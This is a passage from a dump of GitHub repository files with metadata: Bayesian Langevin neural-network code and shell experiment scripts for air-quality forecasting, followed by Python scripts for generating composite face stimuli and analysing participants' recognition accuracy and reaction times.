ax.set_xlabel('Weights & Biases')\n ax.set_ylabel('Posterior')\n\n plt.title(\"Boxplot of Posterior W (weights and biases)\")\n plt.savefig(results_path + 'w_pos.png')\n plt.savefig(results_path + 'w_pos.svg', format='svg', dpi=600)\n plt.clf()\n\n#################################################################################\n# TURN THE TEST PREDICTIONS INTO MEAN PREDICTION AND A RANGE OF QUANTILE BANDS\n# THEN CALCULATE SUMMARY STATISTICS ABOUT THE CALIBRATION OF THE MODEL \n#################################################################################\ndef create_test_forecast_bands(burnin, input, test_preds_file, testdata, results_path):\n # OPEN THE RESULTS FILE\n rez = np.loadtxt(test_preds_file)\n # CULL THE BURNIN\n tested = rez[int(burnin):, ]\n fx_mu = tested.mean(axis=0)\n fx_99 = np.percentile(tested, 99, axis=0)\n fx_95 = np.percentile(tested, 95, axis=0)\n fx_90 = np.percentile(tested, 90, axis=0)\n fx_80 = np.percentile(tested, 80, axis=0)\n fx_20 = np.percentile(tested, 20, axis=0)\n fx_10 = np.percentile(tested, 10, axis=0)\n fx_5 = np.percentile(tested, 5, axis=0)\n fx_1 = np.percentile(tested, 1, axis=0)\n y_test = testdata[:, input]\n data = {'y':y_test, 'qrt_1':fx_1, 'qrt_5':fx_5, 'qrt_10':fx_10, 'qrt_20':fx_20, 'mu': fx_mu, \n 'qrt_80':fx_80, 'qrt_90':fx_90, 'qrt_95':fx_95, 'qrt_99':fx_99 }\n df = pd.DataFrame(data)\n df.to_csv(results_path + 'testdata_prediction_intervals.csv', index=False)\n\n df[\"in_98_window\"] = np.where( (df['y']>df['qrt_1']) & (df['y']<df['qrt_99']), 1, 0 )\n df[\"in_90_window\"] = np.where( (df['y']>df['qrt_5']) & (df['y']<df['qrt_95']), 1, 0 )\n df[\"in_80_window\"] = np.where( (df['y']>df['qrt_10']) & (df['y']<df['qrt_90']), 1, 0 )\n df[\"in_60_window\"] = np.where( (df['y']>df['qrt_20']) & (df['y']<df['qrt_80']), 1, 0 )\n df[\"window_size_98\"] = df['qrt_99'] - df['qrt_1']\n df[\"window_size_90\"] = df['qrt_95'] - df['qrt_5']\n df[\"window_size_80\"] = df['qrt_90'] - df['qrt_10']\n df[\"window_size_60\"] = df['qrt_80'] - df['qrt_20']\n\n df[\"base_error\"] = fx_mu - y_test\n df[\"abs_error\"] = abs(df[\"base_error\"])\n \n in_98_window = df[\"in_98_window\"].mean()\n in_90_window = df[\"in_90_window\"].mean()\n in_80_window = df[\"in_80_window\"].mean()\n in_60_window = df[\"in_60_window\"].mean()\n max_window_size_98 = df[\"window_size_98\"].max() \n mean_window_size_98 = df[\"window_size_98\"].mean() \n min_window_size_98 = df[\"window_size_98\"].min() \n\n max_window_size_90 = df[\"window_size_90\"].max() \n mean_window_size_90 = df[\"window_size_90\"].mean() \n min_window_size_90 = df[\"window_size_90\"].min() \n max_window_size_80 = df[\"window_size_80\"].max() \n mean_window_size_80 = df[\"window_size_80\"].mean() \n min_window_size_80 = df[\"window_size_80\"].min()\n \n max_window_size_60 = df[\"window_size_60\"].max() \n mean_window_size_60 = df[\"window_size_60\"].mean() \n min_window_size_60 = df[\"window_size_60\"].min() \n\n sum_data = { 'window': [98,90,80,60],\n 'calibration':[in_98_window,in_90_window,in_80_window,in_60_window],\n 'min_size':[min_window_size_98,min_window_size_90,min_window_size_80,min_window_size_60],\n 'mean_size':[mean_window_size_98,mean_window_size_90,mean_window_size_80,mean_window_size_60],\n 'max_size':[max_window_size_98,max_window_size_90,max_window_size_80,max_window_size_60] }\n sum_df = pd.DataFrame(sum_data)\n sum_df.to_csv(results_path + 'testdata_calibration.csv', index=False)\n\nif __name__ == \"__main__\": main()\n\n"
},
{
"alpha_fraction": 0.6772908568382263,
"alphanum_fraction": 0.7622842192649841,
"avg_line_length": 67.2727279663086,
"blob_id": "e652f83d6acdc376b325199eb0882498dcd2660b",
"content_id": "374b22e66226a954d3d77efbc09fe8a79871df1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 753,
"license_type": "no_license",
"max_line_length": 301,
"num_lines": 11,
"path": "/experiments/RUN_Delhi_DeepGBFFNN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n \ncd ../\n\n# Delhi Air Quality\n\npython ./train_bn_mcmc.py 20 5 1 3 DeepGBFFNN sigmoid data/Delhi/STN_144/train_normalised.csv data/Delhi/STN_144/test_normalised.csv results/Delhi_144_DeepGBFFNN_Sigmoid/ MASE 1000\n\npython ./transform_test_results.py \"./results/Delhi_144_DeepGBFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_144_DeepGBFFNN_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_144/test.csv\" \"data/Delhi/STN_144/nzr_config.yaml\" True False False False \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\npython analyse_test_results.py \"./results/Delhi_144_DeepGBFFNN_Sigmoid\" \"./results/Delhi_144_DeepGBFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_144/test.csv\" 500 \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\n\n"
},
{
"alpha_fraction": 0.456078439950943,
"alphanum_fraction": 0.4663529396057129,
"avg_line_length": 41.072608947753906,
"blob_id": "f180ba2d9409bcb59d8646429c8d62baa684e73e",
"content_id": "ba04d6ecb6c4c2967463aaf41db3843a5317cb0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12750,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 303,
"path": "/src/LangevinFFNN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\nimport time\nimport math\nfrom LangevinNeuralNetwork import LangevinNeuralNetwork\n\n#-------------------------------------------------------------------------------\n# A Langevin Bayesian Neural Network \n# \n# Contains a rnage of methods that make a neural network learner amenable to\n# learning a set of weightings using a MCMC process with Langevin dynamics.\n#-------------------------------------------------------------------------------\nclass LangevinFFNN(LangevinNeuralNetwork):\n\n def __init__(self, input, hidden, output, output_act, eval_metric):\n\n self.hidden = hidden\n self.sgd_runs = 1\n LangevinNeuralNetwork.__init__(self, input, output, output_act, eval_metric) \n\n self.w_size = self.get_weight_vector_length()\n # for Equation 9 in Ref [Chandra_ICONIP2017]\n self.sigma_diagmat = np.zeros((self.w_size, self.w_size)) \n np.fill_diagonal(self.sigma_diagmat, self.step_w)\n\n self.initialise_cache()\n\n self.W1 = np.random.randn(self.input, self.hidden) / np.sqrt(self.input)\n self.B1 = np.random.randn(1, self.hidden) / np.sqrt(self.hidden) # bias first layer\n self.W2 = np.random.randn(self.hidden, self.output) / np.sqrt(self.hidden)\n self.B2 = np.random.randn(1, self.output) / np.sqrt(self.hidden) # bias second layer\n\n self.hidout = np.zeros((1, self.hidden)) # output of first hidden layer\n self.out = np.zeros((1, self.output)) # output layer for base model\n\n self.final_out = np.zeros((1, self.output)) # Final output for the model\n\n ######################################################################\n # PRINT THE ARCHITECTURE\n ######################################################################\n def print(self):\n print(\"Bayesian Langevin FEED FORWARD Neural Network\")\n print(\"Batch Mode:\", self.use_batch)\n print(\"Learning Rate:\", self.lrate)\n print(\"Input Nodes:\", self.input)\n print(\"Hidden Nodes:\", self.hidden)\n print(\"Output Nodes:\", self.output)\n\n\n ######################################################################\n # PASS DATA X THROUGH THE NETWORK TO PRODUCE AN OUTPUT\n ######################################################################\n def forward_pass(self, X):\n z1 = X.dot(self.W1) - self.B1\n self.hidout = self.sigmoid(z1) # output of first hidden layer\n z2 = self.hidout.dot(self.W2) - self.B2\n self.out = self.sigmoid(z2)\n self.final_out = self.out\n return self.final_out\n\n ######################################################################\n # BATCH UPDATE FUNCTIONS FOR STOCHASTIC GRADIENT DESCENT\n # WE STORE THE WEIGHT AND BIAS UPDATES UNTIL THE BATCH IS FINISHED\n # THEN APPLY THEM\n ######################################################################\n def reset_batch_update(self):\n self.W2_batch_update = self.W2.copy()\n self.B2_batch_update = self.B2.copy()\n self.W1_batch_update = self.W1.copy()\n self.B1_batch_update = self.B1.copy()\n\n def apply_batch_update(self):\n self.W2 = self.W2_batch_update\n self.B2 = self.B2_batch_update\n self.W1 = self.W1_batch_update\n self.B1 = self.B1_batch_update\n\n ########################################################################################\n # RUN THE ERROR BACK THROUGH THE NETWORK TO CALCULATE THE CHANGES TO\n # ALL PARAMETERS.\n # NOTE - THIS IS CALLED AFTER THE forward_pass\n # - YOU NEED TO CALL reset_batch_update() BEFORE STARTING THE BATCH\n # - YOU NEED TO CALL apply_batch_update() AFTER ALL DATA POINTS IN THE BATCH \n ########################################################################################\n def backward_pass_batch(self, Input, desired):\n out_delta = (desired - self.final_out) * (self.final_out * (1 - self.final_out))\n hid_delta = out_delta.dot(self.W2.T) * (self.hidout * (1 - self.hidout))\n\n for x in range(0, self.hidden):\n for y in range(0, self.output):\n self.W2_batch_update[x, y] += self.lrate * out_delta[y] * self.hidout[x]\n for y in range(0, self.output):\n self.B2_batch_update[y] += -1 * self.lrate * out_delta[y]\n\n for x in range(0, self.input):\n for y in range(0, self.hidden):\n self.W1_batch_update[x, y] += self.lrate * hid_delta[y] * Input[x]\n for y in range(0, self.hidden):\n self.B1_batch_update[y] += -1 * self.lrate * hid_delta[y]\n\n ########################################################################################\n # RUN THE ERROR BACK THROUGH THE NETWORK TO CALCULATE THE CHANGES TO ALL PARAMETERS.\n ########################################################################################\n def backward_pass(self, Input, desired):\n out_delta = (desired - self.final_out) * (self.final_out * (1 - self.final_out))\n hid_delta = out_delta.dot(self.W2.T) * (self.hidout * (1 - self.hidout))\n\n for x in range(0, self.hidden):\n for y in range(0, self.output):\n self.W2[x, y] += self.lrate * out_delta[y] * self.hidout[x]\n for y in range(0, self.output):\n self.B2[y] += -1 * self.lrate * out_delta[y]\n\n for x in range(0, self.input):\n for y in range(0, self.hidden):\n self.W1[x, y] += self.lrate * hid_delta[y] * Input[x]\n for y in range(0, self.hidden):\n self.B1[y] += -1 * self.lrate * hid_delta[y]\n\n\n\n ######################################################################\n # RETURN AN UPDATED WEIGHT VECTOR USING GRADIENT DESCENT\n # BackPropagation with SGD\n ######################################################################\n def langevin_gradient_update(self, data, w): \n if self.use_batch:\n return self.calculate_gradient_using_batch(data, w)\n else :\n return self.calculate_gradient_sgd(data, w)\n\n ######################################################################\n # BackPropagation with batch update\n ######################################################################\n def calculate_gradient_using_batch(self, data, w):\n self.decode(w) # method to decode w into W1, W2, B1, B2.\n size = data.shape[0]\n self.reset_batch_update()\n \n Input = np.zeros((1, self.input)) \n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n \n for i in range(0, self.sgd_runs):\n for j in range(0, size):\n pat = j \n Input = data[pat, 0:self.input]\n Desired = data[pat, self.input:]\n self.forward_pass(Input)\n self.backward_pass_batch(Input, Desired)\n self.apply_batch_update()\n w_updated = self.encode()\n\n return w_updated\n\n\n\n ######################################################################\n # BackPropagation with SGD\n ######################################################################\n def calculate_gradient_sgd(self, data, w):\n self.decode(w) # method to decode w into W1, W2, B1, B2.\n size = data.shape[0]\n\n Input = np.zeros((1, self.input)) \n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n\n for i in range(0, self.sgd_runs):\n for i in range(0, size):\n pat = i\n Input = data[pat, 0:self.input]\n Desired = data[pat, self.input:]\n self.forward_pass(Input)\n self.backward_pass(Input, Desired)\n\n w_updated = self.encode()\n return w_updated\n\n\n\n\n ######################################################################\n # TAKE A SINGLE VECTOR OF FLOATING POINT NUMBERS AND USE IT TO \n # SET THE VALUES OF ALL WEIGHTS AND BIASES\n ######################################################################\n def decode(self, w):\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n\n start_index = 0\n w_layer1 = w[start_index:input_layer_wts]\n self.W1 = np.reshape(w_layer1, (self.input, self.hidden))\n start_index = start_index + input_layer_wts\n\n self.B1 = w[start_index:start_index + self.hidden]\n start_index = start_index + self.hidden\n\n w_layer2 = w[start_index: start_index + output_layer_wts]\n self.W2 = np.reshape(w_layer2, (self.hidden, self.output))\n start_index = start_index + output_layer_wts\n\n self.B2 = w[start_index:start_index + self.output]\n start_index = start_index + self.output\n\n ######################################################################\n # ENCODE THE WEIGHTS AND BIASES INTO A SINGLE VECTOR \n ######################################################################\n def encode(self):\n w1 = self.W1.ravel()\n w2 = self.W2.ravel()\n w = np.concatenate([w1, self.B1, w2, self.B2])\n return w\n\n ######################################################################\n # PROCESS DATA\n # RUN A NUMBER OF EXAMPLES THROUGH THE NETWORK AND RETURN PREDICTIONS\n ######################################################################\n def process_data(self, data): \n size = data.shape[0]\n Input = np.zeros((1, self.input)) # temp hold input\n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n for pat in range(0, size):\n Input[:] = data[pat, 0:self.input]\n Desired[:] = data[pat, self.input:]\n self.forward_pass(Input)\n fx[pat] = self.final_out\n return fx\n\n\n ######################################################################\n # EVALUATE PROPOSAL \n # THIS METHOD NEEDS TO SET THE WEIGHT PARAMETERS\n # THEN PASS THE SET OF DATA THROUGH, COLLECTING THE OUTPUT FROM EACH\n # OF THE BOOSTED LAYERS, AND THE FINAL OUTPUT\n ######################################################################\n def evaluate_proposal(self, data, w): \n self.decode(w)\n fx = self.process_data(data)\n y = data[:, self.input]\n feats = data[:, :self.input]\n metric = self.eval(fx, y, feats)\n return [fx, metric]\n\n\n ######################################################################\n # LOG LIKELIHOOD\n # CALCULATED GIVEN \n # - A PROPOSED SET OF WEIGHTS\n # - A DATA SET \n # - AND THE PARAMETERS FOR THE ERROR DISTRIBUTION\n ######################################################################\n def log_likelihood(self, data, w, tausq):\n y = data[:, self.input]\n [fx, rmse] = self.evaluate_proposal(data, w)\n loss = -0.5 * np.log(2 * math.pi * tausq) - 0.5 * np.square(y - fx) / tausq\n return np.sum(loss)\n\n\n ######################################################################\n # LOG PRIOR\n ######################################################################\n def log_prior(self, w, tausq):\n h = self.hidden # number hidden neurons\n d = self.input # number input neurons\n part1 = -1 * ((d * h + h + 2) / 2) * np.log(self.sigma_squared)\n part2 = 1 / (2 * self.sigma_squared) * (sum(np.square(w)))\n logp = part1 - part2 - (1 + self.nu_1) * np.log(tausq) - (self.nu_2 / tausq)\n return logp\n\n\n ######################################################################\n # GET THE COMPLETE LENGTH OF THE ENCODED WEIGHT VECTOR\n ######################################################################\n def get_weight_vector_length(self):\n start_index = 0\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n boost_layer_wts = self.hidden * self.hidden\n start_index = start_index + input_layer_wts\n start_index = start_index + self.hidden\n start_index = start_index + output_layer_wts\n start_index = start_index + self.output\n return start_index\n\n\n\n ######################################################################\n # GET PROPOSAL TAU VALUE FOR ERROR DISTRIBUTION \n ######################################################################\n def get_proposal_tau(self, eta):\n eta_pro = eta + np.random.normal(0, self.step_eta, 1)\n tau_pro = math.exp(eta_pro)\n return [eta_pro, tau_pro]\n\n\n ######################################################################\n # GET THE WEIGHT VECTOR\n ######################################################################\n def get_weight_vector(self):\n mytemp = [get_weight_vector_length()]\n return mytemp\n\n\n"
},
{
"alpha_fraction": 0.7151300311088562,
"alphanum_fraction": 0.7742316722869873,
"avg_line_length": 83.5,
"blob_id": "4053082c33a2f3b2a66648063c6ad795c4eff7e8",
"content_id": "83cc620825bdcae4125c3e6980bf8f6ab4b9e35e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 846,
"license_type": "no_license",
"max_line_length": 311,
"num_lines": 10,
"path": "/experiments/RUN_BeiJing_24hr_LangevinFFNN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\npython3 ./train_bn_mcmc.py 53 20 1 0 LangevinFFNN sigmoid data/Beijing/sets/Train_24_hour_norm.csv data/Beijing/sets/Test_24_hour_norm.csv results/Beijing_24Hr_LvnFFNN_Sigmoid/ MASE 10000\n\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n \npython3 ./transform_test_results.py \"./results/Beijing_24Hr_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_24Hr_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" \"data/Beijing/sets/Target_24_nzr_config.yaml\" True False False False \"TARGET_pm2.5_24_VALUE\" \"pm2.5\" \n\npython3 analyse_test_results.py \"./results/Beijing_24Hr_LvnFFNN_Sigmoid\" \"./results/Beijing_24Hr_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" 5000 \"TARGET_pm2.5_24_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.42352941632270813,
"alphanum_fraction": 0.42352941632270813,
"avg_line_length": 40.5,
"blob_id": "aeba2633bc6b76a2ef6ebc7fbd885d9cd5e0c8fc",
"content_id": "46d55a458e0a7548bdb19f3e993c21e3c2a1c343",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 2,
"path": "/data/Beijing/sets/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "PLACEHOLDER DIRECTORY FOR PROCESSED DATA\n-----------------------------------------\n \n"
}
] | 41 |
almasi771/face_stimuli | https://github.com/almasi771/face_stimuli | b2f6fcbc4a056a7f2fefc220dea81ca957138bad | 8ccda16034168533fbd76aecec21492e2c93b3bb | a083a09322be75cfdbfd852705a803106997c2a4 | refs/heads/master | 2020-06-04T09:11:33.726362 | 2014-04-09T18:50:57 | 2014-04-09T18:50:57 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6481963396072388,
"alphanum_fraction": 0.6623280048370361,
"avg_line_length": 25.633663177490234,
"blob_id": "f1591e8b948d992d58ca6fc83a268dda7454e17e",
"content_id": "77e8a9bb3e8dde04d3b4d6703fd5c6b75c7eeae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2689,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 101,
"path": "/internal_testing.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "import os\nfrom datetime import datetime\nimport smtplib\n\ndef txt_time(start_time, user, pswd, from_user, txt_num):\n end_time = datetime.now() - start_time\n server=smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(user,pswd)\n msg = \"Running time for EyeMask: \"+str(end_time)\n server.sendmail(from_user, txt_num, msg)\n\ndef pregen(f):\n\toutdir = '/Users/almaskebekbayev/Documents/research/internal_testing/internal_out/'\n\tfor i in xrange(len(f)):\n\t\tfor j in xrange(len(f)):\n\t\t\tif f[i] != f[j]:\n\t\t\t\tbash_command = \"convert \"+str(f[i])+\" \"+str(f[j])+\" EyeMask.jpg -composite \"+outdir+str(f[i])+'+'+str(f[j])+\"+EyeMask.jpg\"\n\t\t\t\tos.system(bash_command)\n\ndef main():\n\tf = []\n\tdir = '/Users/almaskebekbayev/Documents/research/internal_testing'\n\tfor dirpath, subdirs,filenames in os.walk(dir):\n\t\tfor i in filenames:\n\t\t\tif i.endswith(\".jpg\"):\n\t\t\t\tif i != 'EyeMask.jpg':\n\t\t\t\t\tf.append(i)\n\t#pregen(f)\n\n\tinternal_eyes = f[:8]\n\tinternal_faces = list(internal_eyes)\n\n\tfor j in xrange(1):\n\t\tfirst = internal_faces[0]\n\t\tinternal_faces = internal_faces[1:]\n\t\tinternal_faces.append(first)\n\n\t#myfile = open('participant_001.txt', 'w')\t\n\ttemp = []\n\tfor i in xrange(len(internal_eyes)):\n\t\ttemp.append(internal_eyes[i])\n\t\ttemp.append(internal_faces[i])\n\n\t#for ii in temp:\n\t#\tmyfile.write(\"%s\\n\" % ii)\n\n\texternal_eyes = f[8:16]\n\texternal_faces = list(external_eyes)\n\n\tfor l in xrange(1):\n\t\tfirst = external_faces[0]\n\t\texternal_faces = external_faces[1:]\n\t\texternal_faces.append(first)\n\n\tll = []\n\tfor jj in xrange(len(external_eyes)):\n\t\tll.append(external_eyes[jj])\n\t\tll.append(external_faces[jj])\n\n\t#for k in ll:\n\t#\tmyfile.write(\"%s\\n\" % k)\n\n\thigh_internal_eyes = f[16:24]\n\thigh_internal_faces = list(high_internal_eyes)\n\n\tss = []\n\tfor i in range(len(high_internal_eyes)):\n\t\tfor j in range(len(high_internal_faces)):\n\t\t\tif high_internal_eyes[i] != high_internal_faces[j]:\n\t\t\t\tss.append(high_internal_eyes[i])\n\t\t\t\tss.append(high_internal_faces[j])\n\t#print \"size of high internal combination is:\", len(ss)/2, 'not 48'\n\n\thigh_external_eyes = f[24:32]\n\thigh_external_faces = list(high_external_eyes)\n\n\t#same issue not 48, but 56\n\tkk = []\n\tfor i in range(len(high_external_eyes)):\n\t\tfor j in range(len(high_external_faces)):\n\t\t\tif high_external_eyes[i] != high_external_faces[j]:\n\t\t\t\tkk.append(high_internal_eyes[i])\n\t\t\t\tkk.append(high_external_faces[j])\n\n\toldLowInternal = temp[:8]\n\toldLowExternal = ll[:8]\n\toldHighInternal = ss[:56]\n\toldHighExternal = kk[:56]\n\tnewLowInternal = temp[8:]\n\n\nif __name__=='__main__':\n\tstart_time = datetime.now()\n\tmain()\n\tuser = ''\n\tpswd = ''\n\tfrom_user = ''\n\tto_user = ''\n\ttxt_num = '@tmomail.net'\n\t#txt_time(start_time, user, pswd, from_user, txt_num)"
},
{
"alpha_fraction": 0.6009286046028137,
"alphanum_fraction": 0.6283439993858337,
"avg_line_length": 30.193103790283203,
"blob_id": "59006bc430d44a28a1ff4663fc24303a21979868",
"content_id": "6687116b8d15bb2ba1cedb6c388a88a624eca69a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4523,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 145,
"path": "/stim_analysis.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "import csv\nimport pandas as pd\nfrom pandas import DataFrame\n\n#returns median number both for even or odd list\ndef median(time_list):\n\tsorts = sorted(time_list)\n\tlength = len(sorts)\n\tif not length%2:\n\t\treturn (sorts[length/2] + sorts[length/2-1]) / float(2)\n\treturn sorts[length/2]\n\ndef confusion_matrix(df_list, fan, status):\n\t#matrix: [[TP, FN], [FP, TN]]\n\ttp_time = []\n\ttn_time = []\n\tmatrix = [[0,0],[0,0]]\n\tfor i in df_list:\n\t\tif i[1] == 'yes-test':\n\t\t\tif i[4] == fan and i[5] == status:\n\t\t\t\tif i[3] == i[6]:\n\t\t\t\t\t#TP\n\t\t\t\t\tmatrix[0][0] += 1 \n\t\t\t\t\t#adding tp_time to the list\n\t\t\t\t\ttp_time.append(i[2])\n\t\t\t\telse:\n\t\t\t\t\t#FP\n\t\t\t\t\tmatrix[1][0] += 1\n\t\tif i[1] == 'no-test':\n\t\t\tif i[4] == fan and i[5] == status:\n\t\t\t\tif i[3] == i[6]:\n\t\t\t\t\t#TN\n\t\t\t\t\tmatrix[1][1] += 1\n\t\t\t\t\t#addting tn_time to the list\n\t\t\t\t\ttn_time.append(i[2])\n\t\t\t\telse:\n\t\t\t\t\t#FN\n\t\t\t\t\tmatrix[0][1] += 1\n\n\tif fan == 'lf':\n\t\tif status == 'ls':\t\t\n\t\t\tfinal = [\n\t\t\t\t\tfloat(matrix[0][0])/4, \n\t\t\t\t\tfloat(matrix[1][0])/4,\n\t\t\t\t\tmedian(tp_time), #median RTs for TP times\n\t\t\t\t\tmedian(tn_time) #median RTs for TN times\n\t\t\t\t\t]\n\t\telse:\n\t\t\tfinal = [\n\t\t\t\t\tfloat(matrix[0][0])/4, \n\t\t\t\t\tfloat(matrix[1][0])/4,\n\t\t\t\t\tmedian(tp_time), #median RTs\n\t\t\t\t\tmedian(tn_time) #median RTs\n\t\t\t\t\t]\n\tif fan == 'hf':\n\t\tif status == 'hs':\n\t\t\tfinal = [\n\t\t\t\t\tfloat(matrix[0][0])/24, \n\t\t\t\t\tfloat(matrix[1][0])/24,\n\t\t\t\t\tmedian(tp_time), #median RTs\n\t\t\t\t\tmedian(tn_time) #median RTs\n\t\t\t\t\t]\n\t\t\t\n\t\telse:\n\t\t\tfinal = [\n\t\t\t\t\tfloat(matrix[0][0])/24, \n\t\t\t\t\tfloat(matrix[1][0])/24,\n\t\t\t\t\tmedian(tp_time), #median RTs\n\t\t\t\t\tmedian(tn_time) #median RTs\n\t\t\t\t\t]\n\n\t#returns final, total TPs, total FPs\n\treturn final, matrix[0][0], matrix[1][0]\n\t\ndef conversion(hf_data):\n\tfinal_test = []\n\tfor x in hf_data:\n\t\tif x[1] == 'hf' and x[6] == 'old':\n\t\t\tx[6] = 'new'\n\t\t\tfinal_test.append(x[6])\n\t\telif x[1] == 'hf' and x[6] == 'new':\n\t\t\tx[6] = 'old'\n\t\t\tfinal_test.append(x[6])\n\t\telse:\n\t\t\tfinal_test.append(x[6])\n\treturn final_test\n\ndef main():\n\t#NOTE: PATH NEEDS TO BE CHANGED!!!\n\t#subject's data\n\tsubject_data = list(csv.reader(open('/path/to/<name>.txt','rb'), delimiter='\\t'))\n\t#master data\n\tmaster_test = DataFrame(pd.read_csv('/path/to/<name>/master-test.csv'))\n\n\t#only TEST data\n\t\"\"\"\n\tBased on subject's csv the df_data is:\n\tdf_data = DataFrame(subject_data[2028:2473:4])\n\tor \n\tdf_data = DataFrame(subject_data[2029:2474:4])]\n\t\"\"\"\n\tdf_data = DataFrame(subject_data[2028:2473:4])\n\n\t#remaining cols: 5,6,11 \n\tdf_data = df_data.drop([x for x in range(13) if x not in (5,6,11)], axis=1)\n\tcols = ['occupation', 'test_resp', 'time']\n\tdf_data.columns = cols\n\t\n\t#parsing occupation data. NOTE: bus driver is shown as 'bus'\n\tdf_data['occupation'] = [x.split()[2].replace(\")\",\"\") for x in df_data['occupation'].values.tolist()]\n\n\t#replacing yes-test and no-test values with old and new accordingly -> for later comparison\n\tdf_data['test_resp_cmp'] = [x.replace(\"yes-test\", \"old\") for x in df_data['test_resp'].values.tolist()]\n\tdf_data['test_resp_cmp'] = [x.replace(\"no-test\", \"new\") for x in df_data['test_resp_cmp'].values.tolist()]\n\n\t#RTs - 250 due to cue timing\n\tdf_data['time'] = [int(x)-250 for x in df_data['time'].values.tolist()]\n\n\t#adding master data\n\tdf_data['fan'] = master_test['fan']\n\tdf_data['status'] = master_test['status']\n\n\t#conversion: old -> new, new -> old\n\tdf_data['master_test'] = conversion(master_test.values.tolist())\n\n\t#output [HighStatusLFHits, HighStatusLFFAs, HighStatusLFHitsRTs, HighStatusLFCRsRTs]\n\thslf_data, hslf_tp_total, hslf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), status='hs', fan='lf')\n\n\t#output: [HighStatusHFHits, HighStatusHFFAs, HighStatusHFHitsRTs, HighStatusHFCRsRTs]\n\thshf_data, hshf_tp_total, hshf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), status='hs', fan='hf')\n\t#print hshf_tp_total, hshf_fp_total\n\n\t#output: [LowStatusLFHits, LowStatusLFFAs, LowStatusLFHitsRTs, LowStatusLFCRsRTs]\n\tlslf_data, lslf_tp_total, lslf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), status='ls', fan='lf')\n\n\t#output: [LowStatusHFHits, LowStatusHFFAs, LowStatusHFHitsRTs, LowStatusHFCRsRTs]\n\tlshf_data, lshf_tp_total, lshf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), status='ls', fan='hf')\n\n\tout = csv.writer(open('path/to/<name>.csv', 'w'), delimiter=',')\n\tout.writerow(sum([hslf_data,hshf_data,lslf_data,lshf_data, \n\t\t[(hslf_tp_total+hshf_tp_total+lslf_tp_total+lshf_tp_total)/float(56)], #total TPs\n\t\t[(hslf_fp_total+hshf_fp_total+lslf_fp_total+lshf_fp_total)/float(56)]], [])) #total FPs\n\t\nif __name__ == '__main__': \n\tmain()\n"
},
{
"alpha_fraction": 0.5051020383834839,
"alphanum_fraction": 0.5051020383834839,
"avg_line_length": 31.66666603088379,
"blob_id": "e2a20f56cb16fccf6d346db89d86b2340d335812",
"content_id": "9536d6c1f5739cdca9ea872a44f03a601fcaef4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 588,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 18,
"path": "/pregen.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "import os\nimport re\n\ndef pregen(dir='.', mask='EyeMask.jpg'):\n os.chdir(dir)\n if not os.path.exists('out'):\n os.makedirs('out')\n files = [f for f in os.listdir('.') if f.endswith('.jpg') and not f.endswith('Mask.jpg') and not f.startswith('.')]\n for a in files:\n for b in files:\n if a != b:\n out = 'out/%s+%s+%s.jpg' % (a, b, mask)\n print 'compositing', out\n bash_command = \"convert %s %s %s -composite %s\" % (a, b, mask, out)\n os.system(bash_command)\n\nif __name__=='__main__':\n pregen()\n"
},
{
"alpha_fraction": 0.6749116778373718,
"alphanum_fraction": 0.6837455630302429,
"avg_line_length": 22.375,
"blob_id": "7ca40eb32fba2eac071cb0835229a48d560e0cd7",
"content_id": "be642fae4425c8bbd9deeb322cfd9877eb8cf819",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 566,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 24,
"path": "/stimuli_test.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
